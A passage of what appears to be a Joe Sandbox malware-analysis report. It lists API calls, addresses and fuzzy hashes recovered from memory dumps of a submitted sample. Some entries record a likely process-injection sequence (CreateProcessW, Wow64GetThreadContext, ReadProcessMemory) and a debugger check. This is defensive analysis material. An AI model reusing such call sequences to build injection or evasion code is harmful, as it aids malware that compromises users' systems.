                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0076C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0076C708
                                                                                • CloseHandle.KERNEL32(00000000,?,0076C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0076C70F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 267fda01731b1821318dac3a1697a587557c1d076c49ebb3c07af5a2559863f3
                                                                                • Instruction ID: fa58bb3a33af7111d710530770e149063b345f46cab4ae21ffd7369a48329a12
                                                                                • Opcode Fuzzy Hash: 267fda01731b1821318dac3a1697a587557c1d076c49ebb3c07af5a2559863f3
                                                                                • Instruction Fuzzy Hash: DDE08632240218B7DB321B54EC09FDA7B18EB46760F108110FB56694E097B52911879C
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0076BB72
                                                                                  • Part of subcall function 00741C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00747A85), ref: 00741CB1
                                                                                  • Part of subcall function 00741C9D: GetLastError.KERNEL32(00000000,?,00747A85), ref: 00741CC3
                                                                                • _free.LIBCMT ref: 0076BB83
                                                                                • _free.LIBCMT ref: 0076BB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                                                                • Instruction ID: 6298796d16ab3c372c438a8296807139e095659638cf9c35f7eb9f0aab9e711b
                                                                                • Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                                                                • Instruction Fuzzy Hash: 86E012E165174186DA2475796E88EB313CC4F06351754081DB85EE7146DF2CE8C085B4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __fread_nolock
                                                                                • String ID: EA06
                                                                                • API String ID: 2638373210-3962188686
                                                                                • Opcode ID: 0bed3f9c467b82b56f9bc8395fa216a5f9289523c7449f5faada299522fd2952
                                                                                • Instruction ID: 3c24d1cf31688c9fc033b2dd7e80cd22ba2c75c64629089eedab5fc85eb5843d
                                                                                • Opcode Fuzzy Hash: 0bed3f9c467b82b56f9bc8395fa216a5f9289523c7449f5faada299522fd2952
                                                                                • Instruction Fuzzy Hash: 4A01DD71904258BEDB18C798CC56FEDBBFC9B15305F00455AF557D6181D578E7048B70
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 00723A73
                                                                                  • Part of subcall function 00741405: __lock.LIBCMT ref: 0074140B
                                                                                  • Part of subcall function 00723ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00723AF3
                                                                                  • Part of subcall function 00723ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00723B08
                                                                                  • Part of subcall function 00723D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00723AA3,?), ref: 00723D45
                                                                                  • Part of subcall function 00723D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00723AA3,?), ref: 00723D57
                                                                                  • Part of subcall function 00723D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,007E1148,007E1130,?,?,?,?,00723AA3,?), ref: 00723DC8
                                                                                  • Part of subcall function 00723D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00723AA3,?), ref: 00723E48
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00723AB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                • String ID:
                                                                                • API String ID: 924797094-0
                                                                                • Opcode ID: cd3d2e6170fa14464a7a0d7d9960cfbf3a256422e2dd10f36a2ff65392c307e0
                                                                                • Instruction ID: 88936105b4961ef85f7cf40ba2c913d7eaabc036ac7c4d9ab96b191278136bfa
                                                                                • Opcode Fuzzy Hash: cd3d2e6170fa14464a7a0d7d9960cfbf3a256422e2dd10f36a2ff65392c307e0
                                                                                • Instruction Fuzzy Hash: 60119371905385DBC700EF29E84990ABBE9EB98710F40C51EF4858B2A2DB789645CB96
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 0074EA29
                                                                                • __close_nolock.LIBCMT ref: 0074EA42
                                                                                  • Part of subcall function 00747BDA: __getptd_noexit.LIBCMT ref: 00747BDA
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                • String ID:
                                                                                • API String ID: 1046115767-0
                                                                                • Opcode ID: f59184a454bd0029bb9eb911a6d3dbec4d98ca94bdad02e52bbe6860e14bf0d3
                                                                                • Instruction ID: 399d2a98d040cd04057718ce7153ac1a0cd706e104c93d100990b80cdedfe313
                                                                                • Opcode Fuzzy Hash: f59184a454bd0029bb9eb911a6d3dbec4d98ca94bdad02e52bbe6860e14bf0d3
                                                                                • Instruction Fuzzy Hash: 9011A5B2A05650DAD716BFA4C8853687A61BF82331F268750E4305F1E3CBBC9C40C7A5
                                                                                APIs
                                                                                  • Part of subcall function 0074395C: __FF_MSGBANNER.LIBCMT ref: 00743973
                                                                                  • Part of subcall function 0074395C: __NMSG_WRITE.LIBCMT ref: 0074397A
                                                                                  • Part of subcall function 0074395C: RtlAllocateHeap.NTDLL(00D60000,00000000,00000001,00000001,00000000,?,?,0073F507,?,0000000E), ref: 0074399F
                                                                                • std::exception::exception.LIBCMT ref: 0073F51E
                                                                                • __CxxThrowException@8.LIBCMT ref: 0073F533
                                                                                  • Part of subcall function 00746805: RaiseException.KERNEL32(?,?,0000000E,007D6A30,?,?,?,0073F538,0000000E,007D6A30,?,00000001), ref: 00746856
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3902256705-0
                                                                                • Opcode ID: da7d245fbc63d3b7946801d0ba4f09741c5c243a9bf339493c7db7ae50421a51
                                                                                • Instruction ID: 86d1c83917fa6693e10eb47f15bdd756e00b1758938c75421212b7422e93bfee
                                                                                • Opcode Fuzzy Hash: da7d245fbc63d3b7946801d0ba4f09741c5c243a9bf339493c7db7ae50421a51
                                                                                • Instruction Fuzzy Hash: 5DF0A47150421EE7E714BF98D8059DE77EC9F02394F608136F90992192DBB89A4086E6
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __lock_file_memset
                                                                                • String ID:
                                                                                • API String ID: 26237723-0
                                                                                • Opcode ID: 45bbb6ba9272350e5525cb5d50dba62832b45e454abe7ae7bcc240636488d850
                                                                                • Instruction ID: bc69bf6b2d7e88f15f222505c39231a3a416e2816dc6cdea61a744bf5ded97c5
                                                                                • Opcode Fuzzy Hash: 45bbb6ba9272350e5525cb5d50dba62832b45e454abe7ae7bcc240636488d850
                                                                                • Instruction Fuzzy Hash: F5018471900209EBCF26AFA58C0999EBB65BF41320F158119F82856161D7398B61DBA1
                                                                                APIs
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                • __lock_file.LIBCMT ref: 00743629
                                                                                  • Part of subcall function 00744E1C: __lock.LIBCMT ref: 00744E3F
                                                                                • __fclose_nolock.LIBCMT ref: 00743634
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2800547568-0
                                                                                • Opcode ID: f25aafb44bb25d410eca8e352e1d0b40d55836df7e739a077acad148f8cc3bf7
                                                                                • Instruction ID: a66527c09c7b5d762541f98639f10bc3d2ec6e8c06884140033b211ae5c2555c
                                                                                • Opcode Fuzzy Hash: f25aafb44bb25d410eca8e352e1d0b40d55836df7e739a077acad148f8cc3bf7
                                                                                • Instruction Fuzzy Hash: F2F0B471901615EADB117F75880A76EBAE06F41330F36C149E429AB2C1CB7C8B019F57
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00F05815
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F05839
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F0585B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1289125454.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_f03000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                • Instruction ID: ca505b6861d56edf20efa2246dbd086c08cc437a035d8f7173d3e560795d1cc3
                                                                                • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                • Instruction Fuzzy Hash: 9612DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81DF5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3c60b9fdd85303241d22a954fcf85cf415a747cbe776e6afbb4d2cd1e3ac200d
                                                                                • Instruction ID: ea4f7826b6a188d0cc2f615e21107dc4ef1d3e799420d5d4aebc4b972064325a
                                                                                • Opcode Fuzzy Hash: 3c60b9fdd85303241d22a954fcf85cf415a747cbe776e6afbb4d2cd1e3ac200d
                                                                                • Instruction Fuzzy Hash: 997107709053E48FEF26CF24E4897697BD0FB55304F08896EE8858B262E77CD985CB52
                                                                                APIs
                                                                                • __flush.LIBCMT ref: 00742A0B
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __flush__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 4101623367-0
                                                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction ID: 3888f6149223a75362db4ff27bfb5fd770ce382d99278c96b81ae49e728894d5
                                                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction Fuzzy Hash: AC41C670700706DFDB288E69C8805AE7BA6AF45360F64C52DFC45D7242EB78ED628B40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: 504a8081ed536da6f08b2c4e0dd6e7750ab2cf4a19c9f8f865f504b90b47efa6
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: 7631D2B0B101059BE718DF18C480A69FBA6FF49340F6486A5E44ADB396DB35EDC1CBC0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: abe6e99fb818d76f7e895aece3a37ad59fb3ab0a0ff33c130130e6ccf5f0270a
                                                                                • Instruction ID: db8b90645a587e38626ebb633b9cfc609a429c64ce9a2a3e5d5d31b8dcebf831
                                                                                • Opcode Fuzzy Hash: abe6e99fb818d76f7e895aece3a37ad59fb3ab0a0ff33c130130e6ccf5f0270a
                                                                                • Instruction Fuzzy Hash: 3F415E70504651CFEB24CF18D454B1ABBE0BF45344F1989ACE99A4B362C77AF845CF92
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 3074181302-0
                                                                                • Opcode ID: 5831eb6dce8887a6693f01f91c2f421a4cff3cfcea7a0ab58962acbc8a857700
                                                                                • Instruction ID: 43f9274ba36612d6424b7a56733ce4d8d22132a48010eecc4678e797d2446c42
                                                                                • Opcode Fuzzy Hash: 5831eb6dce8887a6693f01f91c2f421a4cff3cfcea7a0ab58962acbc8a857700
                                                                                • Instruction Fuzzy Hash: CE216FB2D05650DBD7267FA8CC897583661BF82336F264640E4714F1E2DBBC8C00CBA5
                                                                                APIs
                                                                                  • Part of subcall function 00724214: FreeLibrary.KERNEL32(00000000,?), ref: 00724247
                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007239FE,?,00000001), ref: 007241DB
                                                                                  • Part of subcall function 00724291: FreeLibrary.KERNEL32(00000000), ref: 007242C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Free$Load
                                                                                • String ID:
                                                                                • API String ID: 2391024519-0
                                                                                • Opcode ID: 8b2eca1abb4064720663722069ed2f7fff8d81ec6fe5b2276758393e80a8bba2
                                                                                • Instruction ID: 754cf1711d0d50ffbd91e936df7cab661b2ecd28c7c567698fe611a25022f800
                                                                                • Opcode Fuzzy Hash: 8b2eca1abb4064720663722069ed2f7fff8d81ec6fe5b2276758393e80a8bba2
                                                                                • Instruction Fuzzy Hash: 0611A331610226EADF14BB75EC0AFAE77E9AF40700F108429F596AA1C1DB78DA459B60
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: 390a18996ebf01102e84af161fcb56429f6d101cdf13689bd02ce2a36c90bd95
                                                                                • Instruction ID: 51c5d5d3d7418bceb8bf24640b691b268c9027aa76dde70babb6ada80be6b3da
                                                                                • Opcode Fuzzy Hash: 390a18996ebf01102e84af161fcb56429f6d101cdf13689bd02ce2a36c90bd95
                                                                                • Instruction Fuzzy Hash: A72125B0508601CFEB24DF68D458B1ABBE1BF84344F144968F99A4B622D73AE855CF92
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 0074AFC0
                                                                                  • Part of subcall function 00747BDA: __getptd_noexit.LIBCMT ref: 00747BDA
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle
                                                                                • String ID:
                                                                                • API String ID: 1144279405-0
                                                                                • Opcode ID: e989b77761c58c61c3c024a84d5014f36efbd94277432197084246e2514afe37
                                                                                • Instruction ID: 424c651b8c15b8462da830a7420d860a3f63b068f6f593ed26e32c7dfc1d9ae5
                                                                                • Opcode Fuzzy Hash: e989b77761c58c61c3c024a84d5014f36efbd94277432197084246e2514afe37
                                                                                • Instruction Fuzzy Hash: A611BFB2805650DBD7167FA4888A75A3A60AF82332F264640E4305F1F3D7BCCD00DBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                                                                • Instruction ID: 14811ac61a3a19635c96e12bb3b855c388a4525b8c3b7c134c67697b5232a991
                                                                                • Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
